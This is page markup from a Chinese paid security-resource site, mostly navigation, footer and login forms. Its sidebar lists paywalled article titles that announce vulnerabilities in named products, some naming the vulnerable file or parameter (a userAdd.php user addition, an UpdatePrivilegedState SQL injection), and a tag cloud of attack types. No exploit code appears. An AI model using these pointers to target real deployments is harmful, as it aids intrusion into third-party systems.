                    <div class="author-tag mt10 mini-scrollbar"><a class="but c-blue-2 tag-forum-post" data-toggle="tooltip" title="共0篇帖子" href="https://vip.bdziyi.com/author/1/?tab=forum"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-posts"></use></svg>0</a><a class="but c-blue tag-posts" data-toggle="tooltip" title="共1.3W+篇文章" href="https://vip.bdziyi.com/author/1/"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-post"></use></svg>1.3W+</a><a class="but c-green tag-comment" data-toggle="tooltip" title="共959条评论" href="https://vip.bdziyi.com/author/1/?tab=comment"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-comment"></use></svg>959</a><a class="but c-yellow tag-follow" data-toggle="tooltip" title="共351个粉丝" href="https://vip.bdziyi.com/author/1/?tab=follow"><i class="fa fa-heart em09"></i>351</a><span class="badg c-red tag-view" data-toggle="tooltip" title="人气值 168W+"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-hot"></use></svg>168W+</span></div>
                    <div class="user-desc mt10 muted-2-color em09">公众号：棉花糖fans</div>
                    
                </div>
            </div>
            <div class="more-posts-mini"><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/60829/">三汇SMG 网关管理软件 8-1-1userAdd.php 文件任意用户添加</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/60824/">【核心数据安全】数据安全管理规定.docx</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/60819/">深圳市智百威科技发展有限公司供应商服务厅系统存在信息泄露</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/60818/">西安九佳易信息资讯有限公司时尚企业管理系统UpdatePrivilegedState code参数存在SQL注入</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/60817/">WayOS路由系统存在信息泄露</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/60816/">赛普EAP企业适配管理平台存在前台sql注入</a></div></div>
        </div>
    </div></div><div></div><div data-affix="true" class="posts-nav-box" data-title="文章目录"></div><div class="theme-box"><div class="box-body notop"><div class="title-theme">最近一周热门文章</div></div><div class="box-body posts-mini-lists zib-widget"><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-red">1</span><a  href="https://vip.bdziyi.com/60804/">泛微OA E-Cology sync接口反序列化命令执行<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-mini"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a><span class="ml6">2025年12月15日</span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 c-yellow"  data-toggle="tooltip" title="付费阅读"><i class="fa fa-book mr3"></i><span class="em09"><svg class="" aria-hidden="true"><use xlink:href="#icon-points"></use></svg></span>9999</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>780</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-yellow">2</span><a  href="https://vip.bdziyi.com/60655/">殡仪馆管理系统 AshesSearch.jsp 信息泄露<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-mini"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a><span class="ml6">2025年12月11日</span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 c-yellow"  data-toggle="tooltip" title="付费阅读"><i class="fa fa-book mr3"></i><span class="em09"><svg class="" aria-hidden="true"><use xlink:href="#icon-points"></use></svg></span>9999</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>729</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-purple">3</span><a  href="https://vip.bdziyi.com/60648/">浙江高格软件股份有限公司高格智能制造目视化系统SCCJ参数存在SQL注入<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-mini"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a><span class="ml6">2025年12月11日</span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 c-yellow"  data-toggle="tooltip" title="付费阅读"><i class="fa fa-book mr3"></i><span class="em09"><svg class="" aria-hidden="true"><use xlink:href="#icon-points"></use></svg></span>9999</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>721</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-blue">4</span><a  href="https://vip.bdziyi.com/60660/">竹云iam认证系统文件读取<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-mini"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a><span class="ml6">2025年12月12日</span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 c-yellow"  data-toggle="tooltip" title="付费阅读"><i class="fa fa-book mr3"></i><span class="em09"><svg class="" aria-hidden="true"><use xlink:href="#icon-points"></use></svg></span>9999</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>706</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-green">5</span><a  href="https://vip.bdziyi.com/60743/">时空智友ERP sqlResult存在SQL注入<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-mini"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a><span class="ml6">2025年12月14日</span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 c-yellow"  data-toggle="tooltip" title="付费阅读"><i class="fa fa-book mr3"></i><span class="em09"><svg class="" aria-hidden="true"><use xlink:href="#icon-points"></use></svg></span>9999</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>681</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 ">6</span><a  href="https://vip.bdziyi.com/60659/">安友固定资产管理存在身份绕过<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-mini"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a><span class="ml6">2025年12月12日</span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 c-yellow"  data-toggle="tooltip" title="付费阅读"><i class="fa fa-book mr3"></i><span class="em09"><svg class="" aria-hidden="true"><use xlink:href="#icon-points"></use></svg></span>9999</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>666</item></div></div></div></div></div></div><div class="theme-box"><div class="box-body notop"><div class="title-theme">标签云</div></div><div class="zib-widget widget-tag-cloud author-tag"><a href="https://vip.bdziyi.com/tag/%e9%be%99%e6%b5%8f%e8%a7%88%e5%99%a8%e6%9c%aa%e5%bc%95%e7%94%a8%e7%9a%84%e6%9c%8d%e5%8a%a1%e8%b7%af%e5%be%84%e7%89%b9%e6%9d%83%e5%8d%87%e7%ba%a7/" class="text-ellipsis but c-red-2">龙浏览器未引用的服务路径特权升级</a><a href="https://vip.bdziyi.com/tag/%e9%bd%bf%e8%bd%ae%e5%9c%b0%e7%90%86%e4%bd%8d%e7%bd%ae%e6%9f%a5%e8%af%a2/" class="text-ellipsis but c-blue">齿轮地理位置查询</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e9%bc%a0%e6%a0%87%e6%8c%89%e9%92%ae%e5%91%bd%e4%bb%a4%e6%b3%a8%e5%85%a5%e8%bf%9c%e7%a8%8b/" class="text-ellipsis but c-yellow">鼠标鼠标按钮命令注入远程</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c/" class="text-ellipsis but c-green">鼠标远程代码执行</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81/" class="text-ellipsis but c-purple">鼠标远程代码</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e8%b7%af%e5%be%84%e9%81%8d%e5%8e%86/" class="text-ellipsis but c-red">鼠标路径遍历</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e6%9c%ac%e5%9c%b0%e6%96%87%e4%bb%b6%e5%8c%85%e5%90%ab/" class="text-ellipsis but ">鼠标本地文件包含</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e6%9c%aa%e5%bc%95%e7%94%a8%e7%9a%84%e6%9c%8d%e5%8a%a1%e8%b7%af%e5%be%84/" class="text-ellipsis but c-blue-2">鼠标未引用的服务路径</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e4%ba%8b%e4%bb%b6%e7%8a%b6%e6%80%81%e6%a0%8f/" class="text-ellipsis but c-yellow-2">鼠标事件状态栏</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87/" class="text-ellipsis but c-green-2">鼠标</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e9%94%99%e8%af%af%e9%a1%b5%e9%9d%a2%e8%b7%a8%e7%ab%99%e7%82%b9%e8%84%9a%e6%9c%ac/" class="text-ellipsis but c-purple-2">默认错误页面跨站点脚本</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e9%85%8d%e7%bd%ae%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c/" class="text-ellipsis but c-red-2">默认配置远程代码执行</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e7%ae%a1%e7%90%86%e5%91%98%e5%87%ad%e6%8d%ae/" class="text-ellipsis but c-blue">默认管理员凭据</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e7%9a%84%e8%b0%83%e5%88%b6%e8%a7%a3%e8%b0%83%e5%99%a8%e4%b8%8a%e7%9a%84%e5%af%86%e7%a0%81%e7%a1%ac%e4%bb%b6%e8%bf%9c%e7%a8%8b/" class="text-ellipsis but c-yellow">默认的调制解调器上的密码硬件远程</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e6%9d%83%e9%99%90/" class="text-ellipsis but c-green">默认权限</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e6%9d%83%e5%88%a9/" class="text-ellipsis but c-purple">默认权利</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%bc%b1%e5%af%86%e7%a0%81%e7%bc%96%e7%a0%81/" class="text-ellipsis but c-red">默认弱密码编码</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%af%86%e7%a0%81/" class="text-ellipsis but ">默认密码</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%ae%89%e5%85%a8%e6%80%a7%e7%a1%ac%e4%bb%b6%e8%bf%9c%e7%a8%8b/" class="text-ellipsis but c-blue-2">默认安全性硬件远程</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%92%8c%e5%bc%b1%e5%8a%a0%e5%af%86/" class="text-ellipsis but c-yellow-2">默认和弱加密</a></div></div></div></main>
<div class="container fluid-widget"></div><footer class="footer">
		<div class="container-fluid container-footer">
		<ul class="list-inline"><li class="hidden-xs" style="max-width: 300px;"><p><a class="footer-logo" href="https://vip.bdziyi.com" title="棉花糖VIP-无境网安靶场-糖心会员-网络安全资源大全-文档库-漏洞库">
                    <img src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2024/11/20241126051508458.jpg" switch-src="https://oss.bdziyi.com/vip/2024/11/20241126051508458.jpg" alt="棉花糖VIP-无境网安靶场-糖心会员-网络安全资源大全-文档库-漏洞库" class="lazyload" style="height: 40px;">
                </a></p><div class="footer-muted em09">本站为棉花糖会员站</div></li><li style="max-width: 550px;"><p class="fcode-links"><a href="https://oss.bdziyi.com/vip/2024/03/20240324085635914.png">友链申请</a>
<a href="https://www.gpt-all.chat/">AI大全 集合网站</a></p><div class="footer-muted em09">Copyright © 2025 · <a href="https://vip.bdziyi.com">棉花糖会员站</a>
<p><a href="https://beian.miit.gov.cn/" style="color: #fbbc05;" target="_blank">
蜀ICP备2025159183号-1</a></p><a href="https://beian.mps.gov.cn/#/query/webSearch?code=51152402000171"
   target="_blank"
   rel="noreferrer"
   style="display:inline-flex; align-items:center; text-decoration:none; color:#fbbc05;">
  <img src="https://beian.mps.gov.cn/web/assets/logo01.6189a29f.png"
       alt="公安备案图标"
       style="height:20px; border:none; margin-right:0.5em;">
  川公网安备51152402000171号
</a></div><div class="footer-contact mt10"><a class="toggle-radius hover-show nowave" href="javascript:;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-d-wechat"></use></svg><div class="hover-show-con footer-wechat-img"><img style="box-shadow: 0 5px 10px rgba(0,0,0,.2); border-radius:4px;" height="100" class="lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2025/09/20250920064037857.png" alt="扫一扫加微信-棉花糖会员站"></div></a><a class="toggle-radius" data-toggle="tooltip" title="发邮件" href="mailto:1113335577@QQ.COM"><svg class="icon" aria-hidden="true" data-viewBox="-20 80 1024 1024" viewBox="-20 80 1024 1024"><use xlink:href="#icon-d-email"></use></svg></a></div></li><li><div class="footer-miniimg" data-toggle="tooltip" title="扫码加微信">
            <p>
            <img class="lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2025/09/20250920064037857.png" alt="扫码加微信-棉花糖会员站">
            </p>
            <span class="opacity8 em09">扫码加微信</span>
        </div></li></ul>	</div>
</footer>
<script type="speculationrules">
{"prefetch":[{"source":"document","where":{"and":[{"href_matches":"\/*"},{"not":{"href_matches":["\/wp-*.php","\/wp-admin\/*","\/vip\/*","\/wp-content\/*","\/wp-content\/plugins\/*","\/wp-content\/themes\/zibll\/*","\/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}
</script>
    <script type="text/javascript">
        window._win = {
            views: '2070',
            www: 'https://vip.bdziyi.com',
            uri: 'https://vip.bdziyi.com/wp-content/themes/zibll',
            ver: '8.3',
            imgbox: '1',
            imgbox_type: 'group',
            imgbox_thumbs: '1',
            imgbox_zoom: '1',
            imgbox_full: '1',
            imgbox_play: '1',
            imgbox_down: '1',
            sign_type: 'modal',
            signin_url: 'https://vip.bdziyi.com/user-sign-6/?tab=signin&redirect_to=https%3A%2F%2Fvip.bdziyi.com%2F2070%2F',
            signup_url: 'https://vip.bdziyi.com/user-sign-6/?tab=signup&redirect_to=https%3A%2F%2Fvip.bdziyi.com%2F2070%2F',
            ajax_url: 'https://vip.bdziyi.com/wp-admin/admin-ajax.php',
            ajaxpager: '',
            ajax_trigger: '<i class="fa fa-angle-right"></i>加载更多',
            ajax_nomore: '没有更多内容了',
            qj_loading: '1',
            highlight_kg: '1',
            highlight_hh: '1',
            highlight_btn: '1',
            highlight_zt: 'enlighter',
            highlight_white_zt: 'enlighter',
            highlight_dark_zt: 'dracula',
            upload_img_size: '3',
            img_upload_multiple: '20',
            upload_video_size: '30',
            upload_file_size: '30',
            upload_ext: 'jpg|jpeg|jpe|gif|png|bmp|tiff|tif|webp|avif|ico|heic|heif|heics|heifs|asf|asx|wmv|wmx|wm|avi|divx|flv|mov|qt|mpeg|mpg|mpe|mp4|m4v|ogv|webm|mkv|3gp|3gpp|3g2|3gp2|txt|asc|c|cc|h|srt|csv|tsv|ics|rtx|css|vtt|dfxp|mp3|m4a|m4b|aac|ra|ram|wav|x-wav|ogg|oga|flac|mid|midi|wma|wax|mka|rtf|pdf|class|tar|zip|gz|gzip|rar|7z|psd|xcf|doc|pot|pps|ppt|wri|xla|xls|xlt|xlw|mdb|mpp|docx|docm|dotx|dotm|xlsx|xlsm|xlsb|xltx|xltm|xlam|pptx|pptm|ppsx|ppsm|potx|potm|ppam|sldx|sldm|onetoc|onetoc2|onetmp|onepkg|oxps|xps|odt|odp|ods|odg|odc|odb|odf|wp|wpd|key|numbers|pages',
            user_upload_nonce: '6dde90f740',
            is_split_upload: '1',
            split_minimum_size: '20',
            comment_upload_img: '1'
        }
    </script>
<div class="float-right round position-bottom scroll-down-hide"><a style="--this-color:#f2c97d;--this-bg:rgba(62,62,67,0.9);" class="float-btn signin-loader" data-toggle="tooltip" data-placement="left" title="开通会员" href="javascript:;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-vip_1"></use></svg></a><span class="newadd-btns hover-show float-btn add-btn">
                    <svg class="icon" aria-hidden="true"><use xlink:href="#icon-add-ring"></use></svg>
                    <div class="hover-show-con dropdown-menu drop-newadd"><a rel="nofollow" class="btn-newadd" href="https://vip.bdziyi.com/newposts-5/"><icon class="jb-green"><i class="fa fa-pencil-square"></i></icon><text>投稿文章</text></a><a rel="nofollow" class="btn-newadd" href="https://vip.bdziyi.com/posts-edit"><icon class="jb-blue"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-posts"></use></svg></icon><text>发布帖子</text></a></div>
                </span><a class="float-btn service-wechat hover-show nowave" title="扫码添加微信" href="javascript:;"><i class="fa fa-wechat"></i><div class="hover-show-con dropdown-menu"><img class="radius4 relative" width="100%" class="lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2025/07/20250709061853399.jpg"  alt="扫码添加微信-棉花糖会员站"></div></a><span class="float-btn qrcode-btn hover-show service-wechat"><i class="fa fa-qrcode"></i><div class="hover-show-con dropdown-menu"><div class="qrcode" data-size="100"></div><div class="mt6 px12 muted-color">在手机上浏览此页面</div></div></span><a class="float-btn ontop fade" data-toggle="tooltip" data-placement="left" title="返回顶部" href="javascript:(scrollTopTo());"><i class="fa fa-angle-up em12"></i></a></div><div mini-touch="nav_search" touch-direction="top" class="main-search fixed-body main-bg box-body navbar-search nopw-sm"><div class="container"><div class="mb20"><button class="close" data-toggle-class data-target=".navbar-search" ><svg class="ic-close" aria-hidden="true"><use xlink:href="#icon-close"></use></svg></button></div><div remote-box="https://vip.bdziyi.com/wp-admin/admin-ajax.php?action=search_box" load-click><div class="search-input"><p><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i></p><p class="placeholder k2"></p>
        <p class="placeholder t1"></p><p><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i></p><p class="placeholder k1"></p><p class="placeholder t1"></p><p></p>
        <p class="placeholder k1" style="height: 80px;"></p>
        </div></div></div></div>    <div class="modal fade" id="u_sign" tabindex="-1" role="dialog">
        <div class="modal-dialog" role="document">
            <div class="sign-content">
                <div class="sign-img absolute hide-sm"><img class="fit-cover radius8 lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://oss.bdziyi.com/vip/2024/04/20240411155954828.jpg" alt="棉花糖VIP-无境网安靶场-糖心会员-网络安全资源大全-文档库-漏洞库"></div>                <div class="sign zib-widget blur-bg relative">
                    <button class="close" data-dismiss="modal">
                        <svg class="ic-close" aria-hidden="true" data-viewBox="0 0 1024 1024" viewBox="0 0 1024 1024"><use xlink:href="#icon-close"></use></svg>                    </button>
                    <div class="text-center"><div class="sign-logo box-body"><img src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2024/03/20240324080312906.png" switch-src="https://oss.bdziyi.com/vip/2024/03/20240324080312906.png" alt="棉花糖VIP-无境网安靶场-糖心会员-网络安全资源大全-文档库-漏洞库" class="lazyload"></div></div>                    <div class="tab-content"><div class="tab-pane fade active in" id="tab-sign-in"><div class="box-body"><div class="title-h-left fa-2x">登录</div><a class="muted-color px12" href="#tab-sign-up" data-toggle="tab">没有账号？立即注册<i class="em12 ml3 fa fa-angle-right"></i></a></div><div id="sign-in"><form><div class="relative line-form mb10"><input type="text" name="username" class="line-form-input" tabindex="1" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">用户名或邮箱</div></div><div class="relative line-form mb10"><input type="password" name="password" class="line-form-input" tabindex="2" placeholder=""><div class="scale-placeholder">登录密码</div><div class="abs-right passw muted-2-color"><i class="fa-fw fa fa-eye"></i></div><i class="line-form-line"></i></div><input machine-verification="geetest" type="hidden" name="captcha_mode" value="geetest" geetest-id="246fa471ce4513eb6fa70847deb7f3f5"><div class="relative line-form mb10 em09"><span class="muted-color form-checkbox"><input type="checkbox" id="remember" checked="checked" tabindex="4" name="remember" value="forever"><label for="remember" class="ml3">记住登录</label></span><span class="pull-right muted-2-color"><a rel="nofollow" class="muted-2-color" href="https://vip.bdziyi.com/user-sign-6/?tab=resetpassword&redirect_to=https%3A%2F%2Fvip.bdziyi.com%2F2070%2F">找回密码</a></span></div><div class="box-body"><input type="hidden" name="action" value="user_signin"><button type="button" class="but radius jb-blue padding-lg signsubmit-loader btn-block"><i class="fa fa-sign-in mr10"></i>登录</button></div></form><p class="social-separator separator muted-3-color em09">社交账号登录</p><div class="social_loginbar"><a rel="nofollow" title="微信登录" href="https://vip.bdziyi.com/oauth/weixingzh?rurl=https%3A%2F%2Fvip.bdziyi.com%2F2070%2F" class="social-login-item weixingzh toggle-radius qrcode-signin"><i class="fa fa-weixin" aria-hidden="true"></i></a></div><div class="muted-color mt10 text-center px12 opacity8">使用社交账号登录即表示同意<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/%e7%94%a8%e6%88%b7%e5%8d%8f%e8%ae%ae/">用户协议</a>、<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/privacy-policy/">隐私声明</a></div></div></div><div class="tab-pane fade" id="tab-sign-up"><div class="box-body"><div class="title-h-left fa-2x">注册</div><a class="muted-color px12" href="#tab-sign-in" data-toggle="tab">已有账号，立即登录<i class="em12 ml3 fa fa-angle-right"></i></a></div><form id="sign-up"><div class="relative line-form mb10"><input type="text" name="name" class="line-form-input" tabindex="1" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">设置用户名</div></div><div class="relative line-form mb10"><input change-show=".change-show" type="text" name="email" class="line-form-input" tabindex="1" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">邮箱</div></div><input machine-verification="geetest" type="hidden" name="captcha_mode" value="geetest" geetest-id="246fa471ce4513eb6fa70847deb7f3f5"><div class="relative line-form mb10 change-show"><input type="text" name="captch" class="line-form-input" autocomplete="off" tabindex="2" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">验证码</div><span class="yztx abs-right"><button type="button" form-action="signup_captcha" class="but c-blue captchsubmit">发送验证码</button></span><div class="abs-right match-ok muted-color"><i class="fa-fw fa fa-check-circle"></i></div><input type="hidden" name="captcha_type" value="email"><input type="hidden" id="_wpnonce" name="_wpnonce" value="017a44e1e3" /></div><div class="relative line-form mb10"><input type="password" name="password2" class="line-form-input" tabindex="3" placeholder=""><div class="scale-placeholder">设置密码</div><div class="abs-right passw muted-2-color"><i class="fa-fw fa fa-eye"></i></div><i class="line-form-line"></i></div><div class="relative line-form mb10"><input type="password" name="repassword" class="line-form-input" tabindex="4" placeholder=""><div class="scale-placeholder">重复密码</div><div class="abs-right passw muted-2-color"><i class="fa-fw fa fa-eye"></i></div><i class="line-form-line"></i></div><div class="box-body"><input type="hidden" name="action" value="user_signup"><button type="button" class="but radius jb-green padding-lg signsubmit-loader btn-block"><svg class="icon mr10" aria-hidden="true" data-viewBox="0 0 1024 1024" viewBox="0 0 1024 1024"><use xlink:href="#icon-signup"></use></svg>注册</button><div class="form-checkbox muted-color mt10 text-center px12 opacity8"><input name="user_agreement" id="user_agreement" type="checkbox"><label for="user_agreement" class="px12 ml6" style="font-weight:normal;">已阅读并同意<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/%e7%94%a8%e6%88%b7%e5%8d%8f%e8%ae%ae/">用户协议</a>、<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/privacy-policy/">隐私声明</a></label></div></div></form></div><div class="tab-pane fade" id="tab-qrcode-signin"><div class="box-body"><div class="title-h-left fa-2x">扫码登录</div><span class="muted-3-color px12">使用<a class="muted-color" href="#tab-sign-in" data-toggle="tab">其它方式登录</a>或<a class="muted-color" href="#tab-sign-up" data-toggle="tab">注册</a></span><a class="muted-color px12 hide" href="#tab-qrcode-signin" data-toggle="tab">扫码登录</a></div><div class="qrcode-signin-container box-body text-center"><p class="placeholder" style="height:180px;width:180px;margin:auto;"></p><p class="placeholder" style="height:27px;width:200px;margin:15px auto 0;"></p></div><div class="muted-color mt10 text-center px12 opacity8">扫码登录即表示同意<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/%e7%94%a8%e6%88%b7%e5%8d%8f%e8%ae%ae/">用户协议</a>、<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/privacy-policy/">隐私声明</a></div></div></div>                </div>
            </div>
        </div>
    </div>
<div class="modal fade" id="rewards-modal-1" tabindex="-1" role="dialog"><div class="modal-dialog modal-mini rewards-popover" style="" role="document"><div class="modal-content"><div style="padding: 1px;"><div class="modal-colorful-header colorful-bg jb-blue"><button class="close" data-dismiss="modal"><svg class="ic-close" aria-hidden="true"><use xlink:href="#icon-close"></use></svg></button><div class="colorful-make"></div><div class="text-center"><div class="em2x"><i class="loading"></i></div></div></div><div class="modal-body"><ul class="flex jse mb10 text-center rewards-box"><li><p class="placeholder s1"></p><div class="rewards-img"> <h4 class="placeholder fit-cover"></h4></div></li> <li><p class="placeholder s1"></p><div class="rewards-img"> <h4 class="placeholder fit-cover"></h4></div></li></ul></div></div></div></div></div>    <div class="modal fade" id="modal-system-notice" tabindex="-1" role="dialog">
        <div class="modal-dialog                                                                                                                                                                         modal-mini"
            style="" role="document">
            <div class="modal-content">
                <div class="modal-body">
